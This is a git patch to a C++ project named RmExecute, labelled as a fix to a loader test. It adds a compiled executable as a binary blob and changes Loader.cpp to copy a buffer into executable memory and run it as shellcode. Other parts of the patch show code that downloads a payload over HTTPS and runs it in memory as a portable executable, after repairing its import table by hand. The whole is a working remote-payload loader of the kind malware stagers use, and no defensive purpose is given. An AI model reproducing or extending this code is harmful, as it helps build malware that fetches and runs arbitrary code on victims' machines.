From 793daa06d5c3c9cab818c14014bd6be0ba784128 Mon Sep 17 00:00:00 2001 From: bakabie Date: Fri, 9 Apr 2021 22:52:46 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E5=A4=8D=E5=8A=A0=E8=BD=BD=E5=99=A8?= =?UTF-8?q?=E6=B5=8B=E8=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- RUN_EXE_MT/RmExecute.exe | Bin 0 -> 11264 bytes RmExecute/123.bin | Bin 205 -> 0 bytes RmExecute/Loader.cpp | 8 ++++++-- RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe | 11 ----------- .../RcDllShelcode.vcxproj.FileListAbsolute.txt | 0 RmExecute/RUN_EXE_MT/RmExecute.exe.recipe | 11 ----------- .../RmExecute.vcxproj.FileListAbsolute.txt | 0 RmExecute/RmExecute.vcxproj | 6 +++--- RmExecute/ShellCode.cpp | 9 ++++----- RmExecute/Tool.h | 8 +++----- RmExecute/open.txt | 1 - 11 files changed, 16 insertions(+), 38 deletions(-) create mode 100644 RUN_EXE_MT/RmExecute.exe delete mode 100644 RmExecute/123.bin delete mode 100644 RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe delete mode 100644 RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt delete mode 100644 RmExecute/RUN_EXE_MT/RmExecute.exe.recipe delete mode 100644 RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt delete mode 100644 RmExecute/open.txt diff --git a/RUN_EXE_MT/RmExecute.exe b/RUN_EXE_MT/RmExecute.exe new file mode 100644 index 0000000000000000000000000000000000000000..a92f91007046d79414ea3671efe7a703f5c85709 GIT binary patch literal 11264 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 Xy=*mo1CW11o3Q7d7=2j&8a?nIo&*Ac literal 0 HcmV?d00001 diff --git a/RmExecute/123.bin b/RmExecute/123.bin deleted file mode 100644 index b64ecedade75a68befb6273118b9c383bbddd370..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 205 zcmaE9E6l*~vPK<9JeC6zW%5Acs|t`P&;b(8sz73%B#=l2aVr#nL^z0bjSEQp)c_I< zARVhgM3E?vcnH$l10u{p>e4_;7J>}8AOa-TgCvqbieo`60Tv*^4zfcGq?i{(+>rnh qmqALJK(_e`00|dqAhBKvNSsmw5_h$ML=A`=3^HDd9Z0AGy#N5>Sw1%a diff --git a/RmExecute/Loader.cpp b/RmExecute/Loader.cpp index 6982e42..23d337e 100644 --- a/RmExecute/Loader.cpp +++ b/RmExecute/Loader.cpp @@ -86,8 +86,12 @@ void RunShellCode() typedef void(WINAPI* fnFun)( char* ); - - fnFun Shellcode = (fnFun)(filebuf); + PVOID p = NULL; + if ((p = VirtualAlloc(NULL, filelen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL) + MessageBoxA(NULL, "ÉêÇëÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK); + if (!(memcpy(p, filebuf, filelen))) + MessageBoxA(NULL, "дÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK); + fnFun Shellcode = (fnFun)p; Shellcode(URL); } diff --git a/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe b/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe deleted file mode 100644 index 7fa831b..0000000 --- a/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe +++ /dev/null @@ -1,11 +0,0 @@ - - - - - C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RcDllShelcode.exe - - - - - - \ No newline at end of file diff --git a/RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt b/RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt deleted file mode 100644 index e69de29..0000000 diff --git a/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe b/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe deleted file mode 100644 index 03cf3a8..0000000 --- a/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe +++ /dev/null @@ -1,11 +0,0 @@ - - - - - C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RmExecute.exe - - - - - - \ No newline at end of file diff --git a/RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt b/RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt deleted file mode 100644 index e69de29..0000000 diff --git a/RmExecute/RmExecute.vcxproj b/RmExecute/RmExecute.vcxproj index c46d6fa..cbbaed2 100644 --- a/RmExecute/RmExecute.vcxproj +++ b/RmExecute/RmExecute.vcxproj @@ -167,7 +167,7 @@ - _DEBUG + _CRT_SECURE_NO_WARNINGS;_DEBUG;_CONSOLE;_LIB @@ -193,7 +193,7 @@ - false + true Console true false @@ -208,7 +208,7 @@ Level3 true false - RUNEXEMT;_CRT_SECURE_NO_WARNINGS + RUNEXEMT;_CRT_SECURE_NO_WARNINGS;_DEBUG MultiThreaded false diff --git a/RmExecute/ShellCode.cpp b/RmExecute/ShellCode.cpp index 017fc01..7f7b6b5 100644 --- a/RmExecute/ShellCode.cpp +++ b/RmExecute/ShellCode.cpp @@ -2,7 +2,7 @@ //¼ÓÔØÆðʼº¯Êý£¬Ìøתµ½Èë¿Úº¯Êý #ifdef _WIN64 -VOID mmLoaderSCStart(){ +VOID mmLoaderSCStart(){ Strat(); #else VOID _declspec(naked) mmLoaderSCStart() @@ -27,7 +27,6 @@ public: Functions fn; - char s_runexe[260]; char* newbuff; @@ -38,8 +37,8 @@ public: newbuff = NULL; Initfunctions(&fn); - char runexe[] = { 'A', 'A','\0' }; - fn.fnmemcpy(s_runexe, runexe, 260); + + }; @@ -67,7 +66,7 @@ public: int size = HttpDownload(host, path, 443, TRUE); - fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK); + //fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK); RunPortableExecutable(); diff --git a/RmExecute/Tool.h b/RmExecute/Tool.h index 0e615d8..d884a8a 100644 --- a/RmExecute/Tool.h +++ b/RmExecute/Tool.h @@ -347,7 +347,7 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header); DWORD op; fn.fnVirtualProtect(iat, iat_size, PAGE_READWRITE, &op); - __try { + while (import_table->Name) { import_base = fn.fnLoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header)); fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header); @@ -375,10 +375,8 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h } import_table++; } - } - __except (1) { - - } + + return; } diff --git a/RmExecute/open.txt b/RmExecute/open.txt deleted file mode 100644 index 02cfe0b..0000000 --- a/RmExecute/open.txt +++ /dev/null @@ -1 +0,0 @@ -213 \ No newline at end of file